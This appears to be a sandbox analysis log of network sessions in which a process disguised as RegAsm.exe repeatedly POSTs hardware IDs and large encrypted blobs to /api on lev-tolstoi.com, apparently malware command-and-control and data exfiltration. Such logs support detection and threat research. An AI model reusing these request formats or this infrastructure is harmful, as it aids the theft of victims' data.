ION4OQOqTu/VGdmB085tvN0VxV6WQjD7QVj2mFv+FM5WhZ9sVo9q+9Do73B236pauWERv1I21es1jddMPkzg/qFlifi3e34e02gdgKe+aK2KQcEvoya0L/N55qify5D6QWP4OFL/Oo7VvShF8po8zF0Q1b4mRtD6tE0zuR/K8P5VV1w81s4brqPbzzE3/gnZa9LD73InxV9BC7W8Pyt0DiDl6Rgy/I9+0bwo5ESfOVm4QEBLYBbEzjEJ47zfzxD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49710	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:24 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12851 Host: lev-tolstoi.com
2024-12-18 10:40:24 UTC	12851	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 35 36 42 34 32 37 39 38 45 32 41 45 42 37 43 42 39 43 38 39 36 36 39 30 41 36 41 32 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 76 6e 71 67 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6556B42798E2AEB7CB9C896690A6A291--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--bvnqg
2024-12-18 10:40:25 UTC	1038	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rbb0lgr3s293i37gnlhtl6vq3f; expires=Sun, 13-Apr-2025 04:27:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WS4mVbOl4Xpy1JFW8Py43vHBwpvE4fb1%2BihDqRq%2BqYLed3PdGTi7kysxRT4lngSBtu632j1itlFyE%2BEaU73WfvukmxpuRqFaMDTtwBbvT4KaE2ggpW3m5FbqLTtGhaFbbWg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e88d9a90342c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2332&min_rtt=2325&rtt_var=886&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13790&delivery_rate=1226375&cwnd=231&unsent_bytes=0&cid=c9b59e9f364d1f82&ts=849&x=0"
2024-12-18 10:40:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:40:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49716	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:26 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15083 Host: lev-tolstoi.com
2024-12-18 10:40:26 UTC	15083	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 35 36 42 34 32 37 39 38 45 32 41 45 42 37 43 42 39 43 38 39 36 36 39 30 41 36 41 32 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 76 6e 71 67 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6556B42798E2AEB7CB9C896690A6A291--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--bvnqg
2024-12-18 10:40:27 UTC	1048	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=njr4loli09idd96buoh710vgdv; expires=Sun, 13-Apr-2025 04:27:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bXytcqXy8QvASrw8oFK2sDFJpK3gCfrN%2BM52J0Uj5aYBituCoX9%2BrW6hZyum6pvUEmbKjhA%2FF%2FZM79z34VteH7LGEV3McyFkrD1AC%2FPex0I7Ny%2BfjvS9dVm%2BxjCY%2FHXVPFs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e88e8e91e434f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1569&rtt_var=603&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16022&delivery_rate=1793611&cwnd=209&unsent_bytes=0&cid=7f987fc31e1b33bc&ts=826&x=0"
2024-12-18 10:40:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:40:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49723	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:29 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20408 Host: lev-tolstoi.com
2024-12-18 10:40:29 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 35 36 42 34 32 37 39 38 45 32 41 45 42 37 43 42 39 43 38 39 36 36 39 30 41 36 41 32 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 76 6e 71 67 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6556B42798E2AEB7CB9C896690A6A291--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--bvnqg
2024-12-18 10:40:29 UTC	5077	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (X6K~`iO\_,mi`m?ls}Q
2024-12-18 10:40:29 UTC	1041	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ngvaphomplo8qnk6rsk5darg51; expires=Sun, 13-Apr-2025 04:27:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bdL9LkD%2FVZA8ZFmGLs7npXwOYg4MEC5KY1llvOln3av6DqnkrScyLGfTKAK%2BpGwr%2BM9db9x6UpRD9iZHnUGJ9u5%2BE1RA3O362rjFTskPkUPqBZhxjHaVKlthSOaUsrVGOKg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e88f6d93f423e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2089&rtt_var=790&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21369&delivery_rate=1397797&cwnd=191&unsent_bytes=0&cid=331f18f9c7d27fba&ts=1029&x=0"
2024-12-18 10:40:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:40:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49730	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:31 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1229 Host: lev-tolstoi.com
2024-12-18 10:40:31 UTC	1229	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 35 36 42 34 32 37 39 38 45 32 41 45 42 37 43 42 39 43 38 39 36 36 39 30 41 36 41 32 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 76 6e 71 67 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6556B42798E2AEB7CB9C896690A6A291--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--bvnqg
2024-12-18 10:40:32 UTC	1035	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g9clrcbn4tbab02beeu7pdqpef; expires=Sun, 13-Apr-2025 04:27:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cBFHfeg%2BoU4MuYMnLkKCOROyvowB69e47%2BSLnICflBdvQzlEgRJ5zOJH4oLC0%2FlGMYoh6Oy50y9HF37jECBdM0WuVpPrer60ZPseCYWhwGPlUZzrOEA4rMgzBf7LLQDBQdQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e89051da88c0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1788&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2145&delivery_rate=1591280&cwnd=206&unsent_bytes=0&cid=cb503ec31b351aa7&ts=755&x=0"
2024-12-18 10:40:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:40:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49742	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:34 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 583247 Host: lev-tolstoi.com
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 35 36 42 34 32 37 39 38 45 32 41 45 42 37 43 42 39 43 38 39 36 36 39 30 41 36 41 32 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 76 6e 71 67 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"6556B42798E2AEB7CB9C896690A6A291--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--bvnqg
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: 83 3b a0 bb ba 95 e6 e3 db c2 fc a8 09 61 4c dd 4e 26 26 fc de f7 62 d5 4e df 18 9f b7 fe b1 82 fa 58 b8 28 ed e8 48 09 06 ee c0 66 0a 3b c2 9f 95 73 64 3c c4 eb ec c3 03 9e 52 85 53 d3 e7 be e8 74 18 db d1 78 a7 c1 08 0b 13 ba 14 4b 11 ba fc d1 5a 51 d1 85 3b 69 d9 1f 88 88 84 1d 3f 4f 27 78 a2 78 bb a6 ff 76 41 dd 89 1e 97 46 77 10 d4 fa 18 72 58 38 7c 60 fb a6 29 20 79 fd 57 1d df 2f e5 a3 72 5b 6a c3 72 b3 af cc 0b 03 31 23 36 6f 7f 3f ef 90 80 5e 4b 9d ed 0f 5f f5 98 cb 38 88 50 de 57 fc a3 69 16 b8 7f 00 f3 a8 3e f8 57 72 7e e9 ef 3f d3 b5 ad 78 2c c5 4a e4 d3 05 99 ab 02 4a 02 a0 69 2f 06 c6 71 b0 6b d6 d8 a0 54 e1 d5 7d 1c 57 61 90 e2 d7 d1 03 01 bd ad 3f 13 f5 12 28 2e 82 98 43 86 e8 bc 1d 40 0d 07 95 0c 20 98 57 06 3c 05 4b 84 4d 7e d1 5a 83 e0 Data Ascii: ;aLN&&bNX(Hf;sd<RStxKZQ;i?O'xxvAFwrX8\|`) yW/r[jr1#6o?^K_8PWi>Wr~?x,JJi/qkT}Wa?(.C@ W<KM~Z
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: 79 35 da 8d 5e 40 6c 99 1b fe 96 4b 73 49 0e 8c d1 43 6a c6 7e b2 da 5a ff 9c cd 48 55 fb 67 9e b4 cf ba 58 d8 3a 50 92 2c 88 06 11 06 2e cd 9f 1d fb e8 fb 38 fe 93 51 b4 7e 84 14 40 4c c6 1f 25 32 9e c4 07 d6 8e 0b 2e 7b 4b af 8a 41 4c 67 53 45 20 1b 35 98 f5 02 05 9f fb df 79 63 ab 49 0b f7 24 80 20 09 b8 9d c3 fc f8 7f bf 35 d0 0a f5 03 29 7e 28 cd 98 49 3b b8 e0 88 18 2c 28 04 11 89 79 aa 07 16 d4 66 99 fc f3 af e7 3e cd b5 06 56 61 13 aa 8f 60 61 83 b7 91 cd e2 fe a3 27 74 1b 6d 4f 5f 29 36 c2 d8 40 a4 5c 0f e5 0c cb e1 87 c5 5b d9 4b 42 b0 f9 49 e3 2e d0 a8 a9 8b 58 cf 2b bb b4 1b d1 ff fa d1 5f ac 48 e4 0f be 7d a0 41 5c 82 ea 37 7c a2 96 1c f1 10 29 d2 d0 66 43 38 12 3d 7e c2 38 3b 5d f5 ec b2 e5 9c bc 3d 92 46 60 ee 95 4f da 53 74 a1 9f c2 d7 f9 Data Ascii: y5^@lKsICj~ZHUgX:P,.8Q~@L%2.{KALgSE 5ycI$ 5)~(I;,(yf>Va`a'tmO_)6@\[KBI.X+_H}A\7\|)fC8=~8;]=F`OSt
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: 82 39 c8 3b 22 30 ff e3 17 49 5d d6 a4 3b 94 9b 8d 45 4f 40 24 af 89 6b a4 9a c8 3b bc e0 a0 f8 ee a3 79 5f 48 4f 9a 0e db 68 7b ff 1a 3c e8 22 ec 7e 8c 20 4d 83 f8 7e d5 eb a2 83 a3 ce 68 e7 2d 89 a9 02 67 16 bb a1 e9 c4 6a 04 56 25 1a 3f 54 da 06 d5 1e e1 8f 82 ba 37 2c b0 82 c8 e0 9f 65 85 6a d3 44 5c bb e7 ba 40 ed b5 08 d9 e9 03 84 dd 1d f2 bc 97 19 69 8d ba 51 90 f3 b9 8e 53 21 5e a7 c8 f0 1f 72 31 50 6c cf 5f ae 66 48 5b 07 9f 34 c9 c1 ee ef c2 1e 1e aa 2e 7a 8f de 8b 03 7f bf a6 99 50 10 0e 12 83 12 07 f8 5a 36 50 b4 fc 9b f1 0d 0c 4d 9f 66 04 a9 88 7b 6a 41 63 bf 78 b0 df e1 34 5b 01 f0 b8 81 3d a4 41 a0 2b 09 4b cc 70 1e 6b 18 9b d8 c9 35 79 2d 93 8d 71 53 d8 b9 d1 f9 56 04 9e 67 55 78 fa 83 65 b3 fe f7 36 88 c0 3c 1f 6f fc ed 88 7b 82 7b a6 a8 Data Ascii: 9;"0I];EO@$k;y_HOh{<"~ M~h-gjV%?T7,ejD\@iQS!^r1Pl_fH[4.zPZ6PMf{jAcx4[=A+Kpk5y-qSVgUxe6<o{{
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: 90 b7 87 d0 7b db 0a a7 7f 1b 98 6f 63 30 5d a2 e7 2c cc c3 0a b7 dd 44 73 75 c0 23 a6 2d 1c e3 22 81 2f 9f 6f 44 7f 61 8c 86 57 eb 6a b7 32 08 7b ad 2a 33 7b 98 3c c3 d6 d2 92 9d fb 8c a0 bd 5b 29 8e 3d c6 f9 c2 8b 32 7c 41 33 af 90 33 ba 46 71 b2 0e f3 9c 13 40 dc ee 89 3b 49 90 63 c9 b6 63 97 7f 9d d1 53 24 fc d9 2a a9 11 25 23 88 51 c0 20 75 9e af 88 7d 6f c7 ac a3 08 22 c2 73 c3 ee 58 4a 35 cd 00 56 9b 3a 68 5a c9 de 55 7b 85 6c 6b fe 0a 2d 18 77 ac f7 7c bd b5 f6 2e fb fe 5d 7c 9f e3 81 c8 7c f4 f1 18 8b a4 50 ea c1 f0 80 2e 5e 97 19 d5 11 67 3d 99 46 38 4a 80 a6 8a 4e 05 fe 55 33 72 4a 07 26 c1 74 04 e9 bb 4f ea eb 17 b6 fc ab 5f 8e e0 27 7f b4 88 3e 68 fe 59 33 62 53 1d 7c 6d d8 2e 89 86 5b 03 1c 97 73 f1 99 24 d6 39 ed 00 af cc cd 50 60 62 5f 41 Data Ascii: {oc0],Dsu#-"/oDaWj2{3{<[)=2\|A33Fq@;IccS$%#Q u}o"sXJ5V:hZU{lk-w\|.]\|\|P.^g=F8JNU3rJ&tO_'>hY3bS\|m.[s$9P`b_A
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: d6 de 8c 24 86 fc dc 66 c1 cc fa 27 8b 24 40 c1 a3 fc 77 91 48 24 d7 a7 26 46 d8 b0 54 61 0f b9 9b 15 67 e7 f3 6d cb 7a c2 09 40 46 e0 95 26 d1 17 28 db 71 8d f7 78 c0 8a 79 93 b3 ed be 15 ee 6e 55 ab 86 77 39 d7 cf b9 78 68 91 72 25 88 bd d9 79 b3 85 57 19 9d 3b b3 73 8d d4 b6 f1 43 94 07 0f ff dd c3 9e 96 04 8b a9 07 90 0c 8d aa 7e b6 7a ae 2e 20 58 e1 8a f0 2e fc e8 40 2b 87 1c 96 a8 b6 c6 d0 73 df f4 d7 e1 e1 a5 b1 33 0e ad 38 86 fb f8 7a 8f 45 5e 3c ef 26 89 7a 4a 24 2e a4 4e 67 42 1c 75 5d c8 25 7b 59 65 54 ba 28 29 89 a6 7e 78 3c 31 3f 41 13 a5 2c b7 51 bc 53 49 12 85 88 f7 3a 99 09 46 46 13 67 44 57 0e ee bf cb 38 e1 06 81 83 4b c2 55 4c 04 4e f5 55 01 a6 9a 2b 60 73 be 7f 5d 08 f1 e1 4c 5d 5d f0 7c d2 d2 0c 10 c3 6b 52 95 d1 2f ec 3c 41 ca b8 03 Data Ascii: $f'$@wH$&FTagmz@F&(qxynUw9xhr%yW;sC~z. X.@+s38zE^<&zJ$.NgBu]%{YeT()~x<1?A,QSI:FFgDW8KULNU+`s]L]]\|kR/<A
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: be 02 d1 6b 97 46 be 8f e9 62 61 45 78 c8 c7 8b 3a b4 65 12 8d 08 ba b1 18 79 f7 ad e1 23 15 8a e3 fb c0 0e 8e 1c 1f f0 c2 ac 8e 22 18 5d 06 0b 7f 57 ef 04 b4 5d 10 f5 23 66 f4 b5 60 af 61 cf 88 4f e8 d6 69 83 0b fc 71 bf 02 db 9e 4f 9e a3 50 4c 8c c5 e3 76 80 a4 ae bd 1a 5e 4a 8d 94 ad b3 01 cd 7f 76 33 5b 8a 51 36 af 14 ec cd d8 52 b7 f1 39 4b 2d 35 8c 67 78 da 1e c2 09 0f 3b 0c ca b4 10 fc 11 a4 c4 83 25 43 1a a6 1c 95 34 1a 3a 20 23 fc fb 12 cf c1 dc e5 54 81 f9 4f 2f f2 4c d7 5a 44 a8 12 c3 65 a9 63 94 3b b9 97 74 d7 d2 e3 23 5b 67 a4 a5 79 b3 10 58 ab 54 67 e2 0b f6 9d 46 d5 ec 1a dc 95 91 06 c1 30 7d c9 b2 7c d0 94 91 a4 99 84 25 09 49 ee 82 11 b3 f9 2c 88 f4 fc 1c 25 b5 23 ff 9e 88 6b 9a 08 02 d3 eb fd b4 a0 9c 0d 2b e3 a7 57 57 bf e8 56 67 94 f0 Data Ascii: kFbaEx:ey#"]W]#f`aOiqOPLv^Jv3[Q6R9K-5gx;%C4: #TO/LZDec;t#[gyXTgF0}\|%I,%#k+WWVg
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: bb 4d fe 3d 78 a5 7c 80 d3 83 e5 ba a0 c6 d7 a7 55 0c 43 d7 63 bd 84 86 7a f8 40 f8 8e f4 28 f6 3d 5f 5f bb 47 11 d4 d5 ca 9a f2 03 80 7a ff 1b c8 c8 dd c8 7b 39 55 c5 9a 37 0c 8a 21 5b 71 c2 16 5d ab 78 77 95 f8 6c 8d bc aa 02 36 c7 b5 b4 15 4e 75 b3 a7 fb be 2e ad b1 2c 63 33 06 ba 02 c1 54 58 13 4f 4f 61 61 04 61 1c 80 e4 14 c1 de 94 27 d9 0b 95 93 d7 32 bd e6 fe 12 30 b9 4f eb 02 c4 2f ca 70 2c 2d ba 64 43 73 3e 42 f8 52 fe 9c 7a 62 93 5f d0 70 57 85 0d 8e c4 2a 82 60 82 19 3a fb 03 e9 0c fd 15 ed 6f be 34 15 f2 12 47 c1 4a 92 7e 09 92 7c aa 53 d5 aa d1 b7 17 af 8a 8b be 2f 00 02 30 58 1b 60 ad 9c 01 53 62 c2 2f bb 67 74 3d 7b 7b b5 5b f2 16 c5 4b 72 4c d0 b8 14 07 09 d5 ea 83 1d e3 de b4 9f 00 7d dc 09 be ea 0e 2a 3b ef 5d b1 ab 38 67 ed 74 cd 4e f4 Data Ascii: M=x\|UCcz@(=__Gz{9U7![q]xwl6Nu.,c3TXOOaaa'20O/p,-dCs>BRzb_pW`:o4GJ~\|S/0X`Sb/gt={{[KrL};]8gtN
